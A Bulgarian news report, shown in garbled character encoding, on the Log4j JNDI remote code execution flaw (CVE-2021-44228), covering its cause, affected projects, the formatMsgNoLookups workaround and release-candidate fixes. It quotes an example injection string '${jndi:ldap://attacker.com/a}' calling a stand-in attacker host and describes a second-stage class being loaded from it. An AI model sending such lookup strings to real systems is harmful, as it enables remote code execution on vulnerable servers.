Π Apache Log4j, ΠΏΠΎΠΏΡΠ»ΡΡΠ½Π° ΡΠ°ΠΌΠΊΠ° Π·Π° ΠΎΡΠ³Π°Π½ΠΈΠ·ΠΈΡΠ°Π½Π΅ Π½Π° ΡΠ΅Π³ΠΈΡΡΡΠΈΡΠ°Π½Π΅ Π² Java ΠΏΡΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΡ, Π±Π΅ΡΠ΅ ΠΈΠ΄Π΅Π½ΡΠΈΡΠΈΡΠΈΡΠ°Π½Π° ΠΊΡΠΈΡΠΈΡΠ½Π° ΡΡΠ·Π²ΠΈΠΌΠΎΡΡ, ΠΊΠΎΡΡΠΎ ΠΏΠΎΠ·Π²ΠΎΠ»ΡΠ²Π° ΠΏΡΠΎΠΈΠ·Π²ΠΎΠ»Π΅Π½ ΠΊΠΎΠ΄ Π΄Π° Π±ΡΠ΄Π΅ ΠΈΠ·ΠΏΡΠ»Π½Π΅Π½, ΠΊΠΎΠ³Π°ΡΠΎ ΡΠΏΠ΅ΡΠΈΠ°Π»Π½ΠΎ ΡΠΎΡΠΌΠ°ΡΠΈΡΠ°Π½Π° ΡΡΠΎΠΉΠ½ΠΎΡΡ Π²ΡΠ² ΡΠΎΡΠΌΠ°Ρ β{jndi:URL}β ΡΠ΅ Π·Π°ΠΏΠΈΡΠ²Π° Π² ΠΆΡΡΠ½Π°Π»Π°. ΠΡΠ°ΠΊΠ°ΡΠ° ΠΌΠΎΠΆΠ΅ Π΄Π° Π±ΡΠ΄Π΅ ΠΈΠ·Π²ΡΡΡΠ΅Π½Π° Π²ΡΡΡ Ρ Java ΠΏΡΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΡ, ΠΊΠΎΠΈΡΠΎ ΡΠ΅Π³ΠΈΡΡΡΠΈΡΠ°Ρ ΡΡΠΎΠΉΠ½ΠΎΡΡΠΈ, ΠΏΠΎΠ»ΡΡΠ΅Π½ΠΈ ΠΎΡ Π²ΡΠ½ΡΠ½ΠΈ ΠΈΠ·ΡΠΎΡΠ½ΠΈΡΠΈ, Π½Π°ΠΏΡΠΈΠΌΠ΅Ρ, ΠΊΠΎΠ³Π°ΡΠΎ ΠΏΠΎΠΊΠ°Π·Π²Π°Ρ ΠΏΡΠΎΠ±Π»Π΅ΠΌΠ½ΠΈ ΡΡΠΎΠΉΠ½ΠΎΡΡΠΈ Π² ΡΡΠΎΠ±ΡΠ΅Π½ΠΈΡ Π·Π° Π³ΡΠ΅ΡΠΊΠ°.
ΠΡΠ±Π΅Π»ΡΠ·Π²Π° ΡΠ΅, ΡΠ΅ ΠΏΠΎΡΡΠΈ Π²ΡΠΈΡΠΊΠΈ ΠΏΡΠΎΠ΅ΠΊΡΠΈ, ΠΈΠ·ΠΏΠΎΠ»Π·Π²Π°ΡΠΈ ΡΠ°ΠΌΠΊΠΈ ΠΊΠ°ΡΠΎ Apache Struts, Apache Solr, Apache Druid ΠΈΠ»ΠΈ Apache Flink, ΡΠ° Π·Π°ΡΠ΅Π³Π½Π°ΡΠΈ ΠΎΡ ΠΏΡΠΎΠ±Π»Π΅ΠΌΠ°, Π²ΠΊΠ»ΡΡΠΈΡΠ΅Π»Π½ΠΎ Steam, Apple iCloud, ΠΊΠ»ΠΈΠ΅Π½ΡΠΈ ΠΈ ΡΡΡΠ²ΡΡΠΈ Π½Π° Minecraft. ΠΡΠ°ΠΊΠ²Π° ΡΠ΅ ΡΡΠ·Π²ΠΈΠΌΠΎΡΡΡΠ° Π΄Π° Π΄ΠΎΠ²Π΅Π΄Π΅ Π΄ΠΎ Π²ΡΠ»Π½Π° ΠΎΡ ΠΌΠ°ΡΠΈΠ²Π½ΠΈ Π°ΡΠ°ΠΊΠΈ ΡΡΠ΅ΡΡ ΠΊΠΎΡΠΏΠΎΡΠ°ΡΠΈΠ²Π½ΠΈ ΠΏΡΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΡ, ΠΏΠΎΠ²ΡΠ°ΡΡΠΉΠΊΠΈ ΠΈΡΡΠΎΡΠΈΡΡΠ° Π½Π° ΠΊΡΠΈΡΠΈΡΠ½ΠΈΡΠ΅ ΡΡΠ·Π²ΠΈΠΌΠΎΡΡΠΈ Π² ΡΠ°ΠΌΠΊΠ°ΡΠ° Apache Struts, ΠΊΠΎΡΡΠΎ ΡΠΏΠΎΡΠ΅Π΄ Π³ΡΡΠ±Π° ΠΎΡΠ΅Π½ΠΊΠ° ΡΠ΅ ΠΈΠ·ΠΏΠΎΠ»Π·Π²Π° Π² ΡΠ΅Π± ΠΏΡΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΡ ΠΎΡ 65% ΠΎΡ Fortune 100 ΠΊΠΎΠΌΠΏΠ°Π½ΠΈΠΈ, Π²ΠΊΠ»ΡΡΠΈΡΠ΅Π»Π½ΠΎ ΠΎΠΏΠΈΡΠΈ Π·Π° ΡΠΊΠ°Π½ΠΈΡΠ°Π½Π΅ Π½Π° ΠΌΡΠ΅ΠΆΠ°ΡΠ° Π·Π° ΡΡΠ·Π²ΠΈΠΌΠΈ ΡΠΈΡΡΠ΅ΠΌΠΈ.
ΠΡΠΎΠ±Π»Π΅ΠΌΡΡ ΡΠ΅ ΡΡΠ΅ΠΆΠ½ΡΠ²Π° ΠΎΡ ΡΠ°ΠΊΡΠ°, ΡΠ΅ ΡΠ°Π±ΠΎΡΠ΅Ρ Π΅ΠΊΡΠΏΠ»ΠΎΠΉΡ Π²Π΅ΡΠ΅ Π΅ ΠΏΡΠ±Π»ΠΈΠΊΡΠ²Π°Π½, Π½ΠΎ ΠΊΠΎΡΠ΅ΠΊΡΠΈΠΈΡΠ΅ Π·Π° ΡΡΠ°Π±ΠΈΠ»Π½ΠΈΡΠ΅ ΠΊΠ»ΠΎΠ½ΠΎΠ²Π΅ Π²ΡΠ΅ ΠΎΡΠ΅ Π½Π΅ ΡΠ° ΠΊΠΎΠΌΠΏΠΈΠ»ΠΈΡΠ°Π½ΠΈ. CVE ΠΈΠ΄Π΅Π½ΡΠΈΡΠΈΠΊΠ°ΡΠΎΡΡΡ Π²ΡΠ΅ ΠΎΡΠ΅ Π½Π΅ Π΅ Π·Π°Π΄Π°Π΄Π΅Π½. ΠΠΎΡΠ΅ΠΊΡΠΈΡΡΠ° Π΅ Π²ΠΊΠ»ΡΡΠ΅Π½Π° ΡΠ°ΠΌΠΎ Π² ΡΠ΅ΡΡΠΎΠ²ΠΈΡ ΠΊΠ»ΠΎΠ½ log4j-2.15.0-rc1. ΠΠ°ΡΠΎ Π·Π°ΠΎΠ±ΠΈΠΊΠΎΠ»Π½ΠΎ ΡΠ΅ΡΠ΅Π½ΠΈΠ΅ Π·Π° Π±Π»ΠΎΠΊΠΈΡΠ°Π½Π΅ Π½Π° ΡΡΠ·Π²ΠΈΠΌΠΎΡΡΡΠ° ΡΠ΅ ΠΏΡΠ΅ΠΏΠΎΡΡΡΠ²Π° Π΄Π° Π·Π°Π΄Π°Π΄Π΅ΡΠ΅ ΠΏΠ°ΡΠ°ΠΌΠ΅ΡΡΡΠ° log4j2.formatMsgNoLookups Π½Π° true.
ΠΡΠΎΠ±Π»Π΅ΠΌΡΡ Π±Π΅ΡΠ΅ ΠΏΡΠΈΡΠΈΠ½Π΅Π½ ΠΎΡ ΡΠ°ΠΊΡΠ°, ΡΠ΅ log4j ΠΏΠΎΠ΄Π΄ΡΡΠΆΠ° ΠΎΠ±ΡΠ°Π±ΠΎΡΠΊΠ° Π½Π° ΡΠΏΠ΅ΡΠΈΠ°Π»Π½ΠΈ ΠΌΠ°ΡΠΊΠΈ β{}β Π² ΡΠ΅Π΄ΠΎΠ²Π΅, ΠΈΠ·Π²Π΅ΠΆΠ΄Π°Π½ΠΈ ΠΊΡΠΌ Π΄Π½Π΅Π²Π½ΠΈΠΊΠ°, Π² ΠΊΠΎΠΈΡΠΎ ΠΌΠΎΠ³Π°Ρ Π΄Π° ΡΠ΅ ΠΈΠ·ΠΏΡΠ»Π½ΡΠ²Π°Ρ JNDI (Java Naming and Directory Interface) Π·Π°ΡΠ²ΠΊΠΈ. ΠΡΠ°ΠΊΠ°ΡΠ° ΡΠ΅ ΡΠ²Π΅ΠΆΠ΄Π° Π΄ΠΎ ΠΏΡΠ΅Π΄Π°Π²Π°Π½Π΅ Π½Π° Π½ΠΈΠ· ΡΡΡ Π·Π°ΠΌΡΠ½Π°ΡΠ° β${jndi:ldap://attacker.com/a}β, ΠΏΡΠΈ ΠΎΠ±ΡΠ°Π±ΠΎΡΠΊΠ°ΡΠ° Π½Π° ΠΊΠΎΡΡΠΎ log4j ΡΠ΅ ΠΈΠ·ΠΏΡΠ°ΡΠΈ LDAP Π·Π°ΡΠ²ΠΊΠ° Π·Π° ΠΏΡΡΡ Π΄ΠΎ Java ΠΊΠ»Π°ΡΠ° Π΄ΠΎ ΡΡΡΠ²ΡΡΠ° Π½Π° attacker.com . ΠΡΡΡΡ, Π²ΡΡΠ½Π°Ρ ΠΎΡ ΡΡΡΠ²ΡΡΠ° Π½Π° Π°ΡΠ°ΠΊΡΠ²Π°ΡΠΈΡ (Π½Π°ΠΏΡΠΈΠΌΠ΅Ρ http://second-stage.attacker.com/Exploit.class), ΡΠ΅ Π±ΡΠ΄Π΅ Π·Π°ΡΠ΅Π΄Π΅Π½ ΠΈ ΠΈΠ·ΠΏΡΠ»Π½Π΅Π½ Π² ΠΊΠΎΠ½ΡΠ΅ΠΊΡΡΠ° Π½Π° ΡΠ΅ΠΊΡΡΠΈΡ ΠΏΡΠΎΡΠ΅Ρ, ΠΊΠΎΠ΅ΡΠΎ ΠΏΠΎΠ·Π²ΠΎΠ»ΡΠ²Π° Π½Π° Π°ΡΠ°ΠΊΡΠ²Π°ΡΠΈΡ Π΄Π° ΠΈΠ·ΠΏΡΠ»Π½ΠΈ ΠΏΡΠΎΠΈΠ·Π²ΠΎΠ»Π΅Π½ ΠΊΠΎΠ΄ Π½Π° ΡΠΈΡΡΠ΅ΠΌΠ° Ρ ΠΏΡΠ°Π²Π°ΡΠ° Π½Π° ΡΠ΅ΠΊΡΡΠΎΡΠΎ ΠΏΡΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΠ΅.
ΠΠΎΠΏΡΠ»Π½Π΅Π½ΠΈΠ΅ 1: ΠΠ° ΡΡΠ·Π²ΠΈΠΌΠΎΡΡΡΠ° Π΅ ΠΏΡΠΈΡΠ²ΠΎΠ΅Π½ ΠΈΠ΄Π΅Π½ΡΠΈΡΠΈΠΊΠ°ΡΠΎΡ CVE-2021-44228.
ΠΠΎΠΏΡΠ»Π½Π΅Π½ΠΈΠ΅ 2: ΠΠ΄Π΅Π½ΡΠΈΡΠΈΡΠΈΡΠ°Π½ Π΅ Π½Π°ΡΠΈΠ½ Π·Π° Π·Π°ΠΎΠ±ΠΈΠΊΠ°Π»ΡΠ½Π΅ Π½Π° Π·Π°ΡΠΈΡΠ°ΡΠ°, Π΄ΠΎΠ±Π°Π²Π΅Π½Π° ΠΎΡ ΠΈΠ·Π΄Π°Π½ΠΈΠ΅ΡΠΎ log4j-2.15.0-rc1. ΠΡΠ΅Π΄Π»ΠΎΠΆΠ΅Π½Π° Π΅ Π½ΠΎΠ²Π° Π°ΠΊΡΡΠ°Π»ΠΈΠ·Π°ΡΠΈΡ, log4j-2.15.0-rc2, Ρ ΠΏΠΎ-ΠΏΡΠ»Π½Π° Π·Π°ΡΠΈΡΠ° ΡΡΠ΅ΡΡ ΡΡΠ·Π²ΠΈΠΌΠΎΡΡΡΠ°. ΠΠΎΠ΄ΡΡ ΠΏΠΎΠ΄ΡΠ΅ΡΡΠ°Π²Π° ΠΏΡΠΎΠΌΡΠ½Π°ΡΠ°, ΡΠ²ΡΡΠ·Π°Π½Π° Ρ Π»ΠΈΠΏΡΠ°ΡΠ° Π½Π° Π½Π΅ΠΎΠ±ΠΈΡΠ°ΠΉΠ½ΠΎ ΠΏΡΠ΅ΠΊΡΡΠ²Π°Π½Π΅ Π² ΡΠ»ΡΡΠ°ΠΉ Π½Π° ΠΈΠ·ΠΏΠΎΠ»Π·Π²Π°Π½Π΅ Π½Π° Π½Π΅ΠΏΡΠ°Π²ΠΈΠ»Π½ΠΎ ΡΠΎΡΠΌΠ°ΡΠΈΡΠ°Π½ JNDI URL.
ΠΠ·ΡΠΎΡΠ½ΠΈΠΊ: opennet.ru